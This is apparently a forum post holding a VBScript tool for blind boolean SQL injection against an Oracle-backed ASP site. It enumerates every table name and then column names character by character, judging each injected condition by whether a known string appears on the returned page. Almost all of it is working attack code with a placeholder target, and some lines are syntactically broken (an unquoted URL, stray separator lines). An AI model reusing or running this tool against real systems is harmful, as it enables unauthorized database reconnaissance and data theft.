感谢marcos,人才呀,巧妙的递归;2010我懒了,以后再加猜字段值内容吧
Set oracleXML = CreateObject("Microsoft.XMLHTTP")
TargetURL = http://www.target.com/information/view.asp?bna=abc 自行修改
RightWord = "正常页面字符串" ’自行修改
if (lcase(right(wscript.fullname,11))="wscript.exe") then
wscript.echo "Execute it under the cmd.exe Plz! Thx."
wscript.quit
end If
Set oArgs = WScript.arguments
if oArgs.count<>0 then
action=trim(oArgs(0))
End if
select case action
case "biao"
biaocrack
case "ziduan"
Ziduancrack
case else
usage
end Select
Function Biaocrack()
WScript.Echo GetTableNameX("")
End Function
Function Ziduancrack()
WScript.Echo GetFileNameX("")
End Function
Function usage()
WScript.Echo "请改动源码里的url和正确页面显示的字符串,默认猜字符型。如果数字型去掉sql语句里的第一个单引号"& vbNewLine
WScript.Echo "cscript this.vbs biao-------------------------------->是猜当前库所有的表名"&vbNewLine
WScript.Echo "cscript this.vbs 表名---------------------------->是猜给定表名里所有的字段名"&vbNewLine
End Function
Function GetTableNameX(sPrefix)
iLen = Len(sPrefix)
sPrefix = UCase(sPrefix)
aChars = Array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "_","-")
For I = 0 To UBound(aChars)
If(iLen = 0)Then
SQL = " and 0<>(select count(*) from user_tables where substr(table_name,1,1)"
Else
SQL = " and 0<>(select count(*) from user_tables where substr(table_name,1," & iLen & ")=" & sPrefix & " AND substr(table_name," & (iLen + 1) & ",1)"
End If
sSQL = SQL & "=" & aChars(I) & ") and a=a"
sHTML = GetPage(TargetURL & sSQL)
iPos = InStr(sHTML, RightWord)
If(iPos > 0)Then
sSQL=" and 0<>(select count(*) from user_tables where table_name=" & sPrefix & aChars(I) & ") and a=a"
sHTML = GetPage(TargetURL & sSQL)
iPos = InStr(sHTML, RightWord)
If(iPos > 0)Then
WScript.Echo "[-]: " & sPrefix & aChars(I)
GetTableNameX = GetTableNameX & sPrefix & aChars(I) & vbNewLine
End If
sSQL=" and 0<>(select count(*) from user_tables where substr(table_name,1," & (iLen + 1) & ")=" & sPrefix & aChars(I) & " AND length(table_name)>" & (iLen + 1) & ") and a=a"
sHTML = GetPage(TargetURL & sSQL)
iPos = InStr(sHTML, RightWord)
If(iPos > 0)Then
WScript.Echo "[+]: " & sPrefix & aChars(I)
GetTableNameX = GetTableNameX & vbNewLine & GetTableNameX(sPrefix & aChars(I))
End If
Else
WScript.Echo sPrefix & aChars(I)
End If
Next
WScript.Echo "=========================================="
End Function
Function GetFileNameX(sPrefix)
iLen = Len(sPrefix)
sPrefix = UCase(sPrefix)
aChars = Array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "_","-")
For I = 0 To UBound(aChars)
If(iLen = 0)Then
SQL = " and 0<>(select count(*) from user_tab_columns where table_name="&UCase(oArgs(1))&" and substr(column_name,1,1)"
Else
SQL = " and 0<>(select count(*) from user_tab_columns where table_name="&UCase(oArgs(1))&" and substr(column_name,1," & iLen & ")=" & sPrefix & " AND substr(column_name," & (iLen + 1) & ",1)"
End If
sSQL = SQL & "=" & aChars(I) & ") and a=a"
WSH.ECHO TargetURL & sSQL
sHTML = GetPage(TargetURL & sSQL)
iPos = InStr(sHTML, RightWord)
If(iPos > 0)Then
sSQL=" and 0<>(select count(*) from user_tab_columns where table_name="&UCase(oArgs(1))&" and column_name=" & sPrefix & aChars(I) & ") and a=a"
WSH.ECHO TargetURL & sSQL
sHTML = GetPage(TargetURL & sSQL)
iPos = InStr(sHTML, RightWord)
If(iPos > 0)Then
WScript.Echo "[-]: " & sPrefix & aChars(I)
GetFileNameX = GetFileNameX & sPrefix & aChars(I) & vbNewLine
End If
sSQL=" and 0<>(select count(*) from user_tab_columns where table_name="&UCase(oArgs(1))&" and substr(column_name,1," & (iLen + 1) & ")=" & sPrefix & aChars(I) & " AND length(column_name)>" & (iLen + 1) & ") and a=a"
WSH.ECHO TargetURL & sSQL
sHTML = GetPage(TargetURL & sSQL)
iPos = InStr(sHTML, RightWord)
If(iPos > 0)Then
WScript.Echo "[+]: " & sPrefix & aChars(I)
GetFileNameX = GetFileNameX & vbNewLine & GetFileNameX(sPrefix & aChars(I))
End If
Else
WScript.Echo sPrefix & aChars(I)
End If
Next
WScript.Echo "=========================================="
End Function
===========================================================
Function GetPage(sURL)
oracleXML.Open "Get", sURL, False, "", ""
oracleXML.Send()
GetPage = BytesToBStr(oracleXML.ResponseBody)
End Function
============================================
函数名称:BytesToBStr
函数功能:将XMLHTTP对象中的内容转化为GB2312编码
============================================
Function BytesToBStr(Body)
Dim oStream
Set oStream = CreateObject("ADODB.Stream")
oStream.Type = 1
oStream.Mode =3
oStream.Open
oStream.Write Body
oStream.Position = 0
oStream.Type = 2
oStream.Charset = "GB2312"
BytesToBstr = oStream.ReadText
oStream.Close
Set oStream = nothing
End Function